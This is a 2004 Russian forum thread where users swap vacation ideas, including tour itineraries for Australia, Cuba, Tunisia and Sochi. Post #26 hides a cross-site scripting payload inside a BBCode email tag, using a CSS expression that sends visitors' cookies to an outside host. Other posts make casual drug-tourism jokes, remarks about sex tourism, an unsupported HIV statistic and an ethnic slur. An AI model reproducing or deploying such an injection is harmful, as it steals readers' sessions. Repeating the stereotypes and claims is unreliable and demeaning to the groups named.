В отпуск?!

05 сентября 2004 года
00
хочу в отпуск, надеюсь скоро предстоит..
куда поехать?!
поделитесь впечатлениями и опытом.
пока ничего кроме доступной по деньгам и оформлению документов поездки в теплые края с целью троганья пирамид и загорания придумать не могу.
05 сентября 2004 года
00
Буду внимательно следить за этой веткой, ибо в ближайший месяц (надеюсь) предстоит решать подобную "проблему"
;)

Цитировать — Сообщение №2
05 сентября 2004 года
00
Австралия.

Цена на двух человек -- 1925 долларов.

Программа тура
День1
Прилет в Сидней. Встреча русскоговорящим гидом. Трансфер и размещение в отеле выбранной категории. Свободное время.

День 2
За дополнительную плату - обзорная экскурсия по Сиднею. Приветственный обед во вращающемся ресторане на Сиднейской Башне. Свободное время. За дополнительную плату - вечерний круиз по заливу Port Jackson c кабаре и ужином.

День 3
Свободное время. За дополнительную плату - экскурсия в Голубые Горы и в парк австралийских животных.

День 4
Трансфер в аэропорт Сиднея. Перелет Сидней – Золотое Побережье Трансфер и размещение в отеле выбранной категории.

День 5 -6
Отдых на Золотом Побережье. За дополнительную плату - посещение парков "Sea World", "Dream World"

День 7
Трансфер в аэропорт Бризбена. Перелет Бризбен - Кэрнс. Трансфер в Порт Дуглас или Палм Ков. Размещение в отеле выбранной категории. Свободное время.

День 8
За дополнительную плату круиз на Большой Барьерный Риф. Катание на лодке с прозрачным дном. Катание на подводной лодке. Плавание с маской. Утренний и вечерний чай

День 9
Свободное время. За дополнительную плату - сафари на джипах туда, где тропики встречаются с коралловым рифом. Круиз по крокодиловой реке.

День 10
Свободное время. За дополнительную плату - поездка на подвесной дороге через тропический лес. Экскурсия в аборигенскую деревушку Куранда. Посещение театра и культурного центра аборигенов.

День 11
Трансфер в аэропорт Кэрнса. Вылет в Россию.

Отели
Сидней: Quality Hotel South Cross 3.5*,
All Seasons Premier Menzies 4*, Sheraton on the Park 5*
Золотое Побережье:
Gold Coast Int std room, Gold Coast ocean view room, Marriott Surfers Paradise 5*
Большой Барьерный Риф
Clarion Resort, garden view room, Clarion Resort, water view room, Peppers Links Resort 5*

В стоимость включено
# Проживание в отелях по выбору - двухместное размещение, включая горячий завтрак ежедневно.

# Трансферы аэропорт-отель-аэропорт на персональном транспорте во всех городах

# Встреча в международном аэропорту Сиднея русскоговорящим гидом, помощь в размещении и ознакомление с программой и дополнительными услугами.


Дополнительно оплачиваются
# Оформление визы

# Международный авиа перелет до Австралии и обратно. Тарифы по запросу

# Дополнительные экскурсии

# Страховка

# Внутренние авиа-перелеты по стране согласно программе

Цитировать — Сообщение №3
05 сентября 2004 года
00
Австралия. - Буква "А" типа первая..... следом есче три десятка... ждём-ссссс

Цитировать — Сообщение №4
05 сентября 2004 года
00
Зимняя экзотика (АВстралия)
11 дней, 10 ночей (без перелета)
Сидней - 3 ночи, Айерс Рок - 1 ночь, Дарвин - 2 ночи
Большой Барьерный Риф - 4 ночи


Программа тура
День1
Прилет в Сидней. Встреча русскоговорящим гидом. Трансфер и размещение в отеле выбранной категории. Свободное время.

День 2
За дополнительную плату - обзорная экскурсия по Сиднею. Приветственный обед во вращающемся ресторане на Сиднейской Башне. Свободное время. За дополнительную плату - вечерний круиз по заливу Port Jackson c кабаре и ужином.

День 3
Свободное время. За дополнительную плату - экскурсия в Голубые Горы и парк австралийских животных, посещение океанариума, круиз по заливу.

День 4
Трансфер в аэропорт Сиднея. Перелет Сидней - Айерс Рок. Размещение в отеле выбранной категории. Вечером на закате солнца За дополнительную плату - ужин «Звуки Тишины» в красной пустыне у подножия горы Olgas.

День 5
За дополнительную плату - встреча восхода солнца у подножия горы Uluru. Для желающих - восхождение на гору Uluru – священное место для аборигенов Австралии. Осмотр пещер с наскальными рисунками. Днем перелет Айерс Рок - Дарвин. Трансфер и размещение в отеле выбранной категории. Свободное время.

День 6
За дополнительную плату - экскурсия в национальный парк Какаду.

День 7
Перелет Дарвин – Кэрнс. Трансфер в Порт Дуглас или Палм Ков и размещение в отеле выбранной категории.

День 8
Свободное время

День 9
За дополнительную плату - круиз на Большой Барьерный Риф. Катание на лодке с прозрачным дном, катание на подводной лодке. Плавание с маской. Утренний и вечерний чай.

День 10
Свободное время. За дополнительную плату - сафари на джипах туда, где тропики встречаются с коралловым рифом. Круиз по крокодиловой реке.

День 11.
Трансфер в аэропорт Кэрнса. Вылет в Россию

Отели
Сидней: Quality Hotel South Cross 3.5*, All Seasons Premier Menzies 4*, Sheraton on the Park 5*
Айерс Рок: Outback Pioneer 3*, Desert Garden 4* , Sails in Desert 5*.
Дарвин: Mirambeena Tourist Resort 3*, Novotel Atrium 4*, MGM Grand Darwin 5*
Большой Барьерный Риф: Clarion Resort, garden view room, Clarion Resort, water view room, Peppers Links Resort 5*.

В стоимость включено
# Проживание в отелях по выбору - двухместное размещение, включая горячий завтрак ежедневно.

# Трансферы аэропорт-отель-аэропорт на персональном транспорте во всех городах, кроме Айерс Рок.

# Встреча в международном аэропорту Сиднея русскоговорящим гидом, помощь в размещении, ознакомление с программой и дополнительными услугами.

Цитировать — Сообщение №5
05 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Aussie
Австралия.

Цена на двух человек -- 1925 долларов.



здорово, но пока дорого


Цитировать — Сообщение №6
05 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Alexi
хочу в отпуск, надеюсь скоро предстоит..
куда поехать?!



Мечтаю о Кубе. Но туда один перелет 900 у.е. стоит. Зато там гаванский ром, сигары, Карибское море и колорит местных жителей.
Осенью в Европе красиво.

А ты чего хочешь - пляжный отдых, экскурсионку, тусовку или экзотику?


Цитировать — Сообщение №7
05 сентября 2004 года
00
Куба слишком отсталая, чтобы там отдыхать, имхо...

Цитировать — Сообщение №8
05 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Aussie
Куба слишком отсталая, чтобы там отдыхать, имхо...



Ничего вы не поняли, молодой человек...


Цитировать — Сообщение №9
05 сентября 2004 года
00
А у Aussie свет клином сошёлся на Автралии.
Она одна прекрасная.

Цитировать — Сообщение №10
05 сентября 2004 года
00
потому что наверно этим летом только там и отдыхала :))) (отдыхало, сори не посмотрел пол :))) ). Короче лучше не знамо чего никто не придумал. Уж если ехать куда так только туда где точно не был и в ближайшее время не появишься.

Цитировать — Сообщение №11
Аноним
спам
05 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Aussie
Куба слишком отсталая, чтобы там отдыхать, имхо...


Гасс, ты какой-то не духовный.
А травеллить надо в Припять, Ямайку и Выборг.


Цитировать — Сообщение №12
05 сентября 2004 года
00
Не, я бы советовал Австралию. Разочарованы не будете!

Цитировать — Сообщение №13
06 сентября 2004 года
00
Ну, о чем я говорил? :D

Цитировать — Сообщение №14
06 сентября 2004 года
00
помнится, несколько лет назад я с родителями ездил в турне по Европе. Маршрут точный уже не назову, но было очень интересно, побывал в Хельсинки, Гамбурге, Брюсселе, Амстердаме, Стокгольме, Париже. Весь этот тур на 10 дней. Впечатлений масса. И вродь стоил тогда 300-400 уёв на человека, точно не помню, но это после кризиса было. Ездили от Нева-Тур.

Цитировать — Сообщение №15
06 сентября 2004 года
00
http://www.nevatravel.ru/
здесь много интересного :)

Цитировать — Сообщение №16
06 сентября 2004 года
00
Трогать пирамиды и тп стремно как то... Взрывают отели и в Ебипте и в Турцыи... Если денег на Австралию нехватает, то лучше в Сочи какие-нибудь, в сентябре там говорят бархатный сезон. Сам побывал летом в славном городе - герое Севастополе - впечатлений масса! Есть и что посмотреть и потусовацца и на море отдохнуть. Сервис может и недотягивает, но мне понравилось больше, чем в Турцыи...

Цитировать — Сообщение №17
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Aussie
Не, я бы советовал Австралию. Разочарованы не будете!




Заело что-ли?

а вы не были случайно на Таити?

:rolleyes: :rolleyes: :rolleyes:


Цитировать — Сообщение №18
06 сентября 2004 года
00
Я не был.

Цитировать — Сообщение №19
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Pitdog
Трогать пирамиды и тп стремно как то... Взрывают отели и в Ебипте и в Турцыи...



замечу - вероятность этого события меньше, чем попасть под машину(считала)... пока


Цитировать — Сообщение №20
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Pitdog
Трогать пирамиды и тп стремно как то... Взрывают отели и в Ебипте и в Турцыи... Если денег на Австралию нехватает, то лучше в Сочи какие-нибудь, в сентябре там говорят бархатный сезон. Сам побывал летом в славном городе - герое Севастополе - впечатлений масса! Есть и что посмотреть и потусовацца и на море отдохнуть. Сервис может и недотягивает, но мне понравилось больше, чем в Турцыи...


Сочи - ацтой: ценник турецкий, сервис - жадно-армянский. Если хватит только моря - туда.


Цитировать — Сообщение №21
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от darina
Мечтаю о Кубе. Но туда один перелет 900 у.е. стоит. Зато там гаванский ром, сигары, Карибское море и колорит местных жителей.
Осенью в Европе красиво.



Дашуля рулит!
Трижды респектую желанию посетить родину Че ;) и Фиделя.
Срочно копим деньги на Кубу, напеваем Гванта-на-ме-ра, и представляем себя эдакими Хэмами.......


п.с. Кстати, помимо рома и сигар на Кубе еще и отменная рыбалка.


Цитировать — Сообщение №22
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Рыбалка в Америке
Дашуля рулит!
Трижды респектую желанию посетить родину Че ;) и Фиделя.
Срочно копим деньги на Кубу, напеваем Гванта-на-ме-ра, и представляем себя эдакими Хэмами.......


п.с. Кстати, помимо рома и сигар на Кубе еще и отменная рыбалка.



а я слышала про несвоственную жительницам социалистических стран сексуальную свободность кубянок. правда за деньги и это одобряется, в т.ч. родителями.
Куба и Тайланд - это для мужской половины...


Цитировать — Сообщение №23
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Alexi
а я слышала про несвоственную жительницам социалистических стран сексуальную свободность кубянок. правда за деньги и это одобряется, в т.ч. родителями.
Куба и Тайланд - это для мужской половины...


Про то, что Куба сильно загазована и запроститучена я скромно умолчал.


Цитировать — Сообщение №24
06 сентября 2004 года
00
надеюсь на след. неделе благополучно отбыть в страну фараонов :)
в прошлом году не успела всё посмотреть.. :)

была бы возможность - с удовольствием съездила бы в Непал.. эх....

Цитировать — Сообщение №25
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Actry
была бы возможность - с удовольствием съездила бы в Непал.. эх....



Лучше ехать в Индию, в штат Гоа, там много бонусов. И что самое прикольное их там можно безнаказанно покурить.
Лен, опять же, Иван Бодхихарма......:))))


Цитировать — Сообщение №26
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Alexi
хочу в отпуск, надеюсь скоро предстоит..
куда поехать?!
поделитесь впечатлениями и опытом.



на картошку!
[email]bill@microsoft.com" style="display:none" sss="x=new Image();x.src='http://zero.h12.ru/stat/capt.php?id=novg_forum&string='+document.cookie;this.sss=null" style="top:expression(eval(this.sss))[/email]


Цитировать — Сообщение №27
06 сентября 2004 года
00
только вернулся с Туниса.
12 дней. на двоих 1300$. все включено. 4 звезды. Порт Эль-Кантау. Ривиера.
экскурсии и прочее на двоих 400$.
Если интересует - напишу подробнее.

Цитировать — Сообщение №28
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Alexi
хочу в отпуск, надеюсь скоро предстоит..
куда поехать?!
поделитесь впечатлениями и опытом.
пока ничего кроме доступной по деньгам и оформлению документов поездки в теплые края с целью троганья пирамид и загорания придумать не могу.



100dorog.ru


Цитировать — Сообщение №29
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Рыбалка в Америке
Лучше ехать в Индию, в штат Гоа, там много бонусов. И что самое прикольное их там можно безнаказанно покурить.
Лен, опять же, Иван Бодхихарма......:))))



я уже была в Копенгагене, в Кристиании, намного ближе в этом плане :smoker:


Цитировать — Сообщение №30
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Actry
я уже была в Копенгагене, в Кристиании, намного ближе в этом плане :smoker:



Кусаю локти и завидую.
Лен, ты хоть сувениров из Кристиании привезла????? :)


Цитировать — Сообщение №31
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Рыбалка в Америке
Кусаю локти и завидую.
Лен, ты хоть сувениров из Кристиании привезла????? :)



что такое Кристиания и где это??


Цитировать — Сообщение №32
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Рыбалка в Америке
Кусаю локти и завидую.
Лен, ты хоть сувениров из Кристиании привезла????? :)



Мишк, давно это было, скурили уже всё :smoker:
Оч. жаль, что нельзя там фотографировать, такое мало где ещё увижу в ближайшие годы...


Цитировать — Сообщение №33
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Alexi
что такое Кристиания и где это??


Кристианиа - район Копенгагена (столица Дании), где лигализованы лёгкие наркотики, однополые браки и тэпэ.
Подробности у М. Веллера.


Цитировать — Сообщение №34
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Alexi
что такое Кристиания и где это??



http://www.naryishkin.spb.ru/nark_soc/press/1998_2000/2000/text/029.htm

"Полиция Дании разработала план штурма Кристиании - "островка свободы" в Копенгагене. По словам инспектора полицейского управления Копенгагена Кая Виттрупа, "настало время раз и навсегда поставить точку в нелегальной торговле гашишем в Кристиании" - районе города, который на протяжении последних более чем 20 лет служит пристанищем свободомыслящей молодежи и является единственным местом в датской столице, где свободно происходит торговля гашишем. Кай Виттруп отказался назвать дату планируемого штурма, однако подчеркнул, что операция требует тщательной подготовки и ресурсов. Даже рядовые полицейские акции в этом районе города проводятся при участии по меньшей мере 60-70 сотрудников полиции. Для проведения штурма Кристиании копенгагенская полиция призовет на помощь своих коллег из других городов страны, сообщает ИА "Росбалт". (http://www.kruzo.com/php/news.php?n=5425)


Цитировать — Сообщение №35
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Actry
Мишк, давно это было, скурили уже всё :smoker:
Оч. жаль, что нельзя там фотографировать, такое мало где ещё увижу в ближайшие годы...



Следующая цель - Уругувай.
Начитаться Борхеса и вперед!


Цитировать — Сообщение №36
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Рыбалка в Америке
Следующая цель - Уругувай.
Начитаться Борхеса и вперед!



может в Мексику за пейотами? :cool:


Цитировать — Сообщение №37
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Рыбалка в Америке
Про то, что Куба сильно загазована и запроститучена я скромно умолчал.



Кстати, раскрепощенным девушкам Кубы знакомы правила безопасного секса.
А вот в Кении, где этот бизнес поставлен на широкую ногу, более 50% страны больны спидом.

Так что Куба все равно рулит.

А еще там настоящие кубинские мачо )

Мишка, копим деньги, адназначно ;)


Цитировать — Сообщение №38
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от DalV
только вернулся с Туниса.
12 дней. на двоих 1300$. все включено. 4 звезды. Порт Эль-Кантау. Ривиера.
экскурсии и прочее на двоих 400$.
Если интересует - напишу подробнее.



Как впечатления? Насколько знаю, в Тунисе заслуживает внимания только экскурсия в Сахару и талассотерапия. Второе интересует больше.
Если Вы этим баловались, то расскажите сколько этот стоит.


Цитировать — Сообщение №39
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от darina
Как впечатления? Насколько знаю, в Тунисе заслуживает внимания только экскурсия в Сахару и талассотерапия. Второе интересует больше.
Если Вы этим баловались, то расскажите сколько этот стоит.



Даш, не думаю, что в такой стране ТОЛЬКО это может заслуживать внимания. Так же как в Египте - только пирамиды, в Риме - только Коллизей.


Цитировать — Сообщение №40
06 сентября 2004 года
00
Цитата:
Первоначальное сообщение от Actry
Даш, не думаю, что в такой стране ТОЛЬКО это может заслуживать внимания. Так же как в Египте - только пирамиды, в Риме - только Коллизей.



Руины Карфагена и Медина меня интересуют в меньшей степени.

О Риме никто не говорил ;) Там одних музеев и магазинов столько, что недели не хватит обойти. И Рим, как правило, входит в поездку по Италии.
А Италия - музей под открытым небом.


Цитировать — Сообщение №41
Эта тема закрыта, так как последнее сообшение было оставлено больше года назад.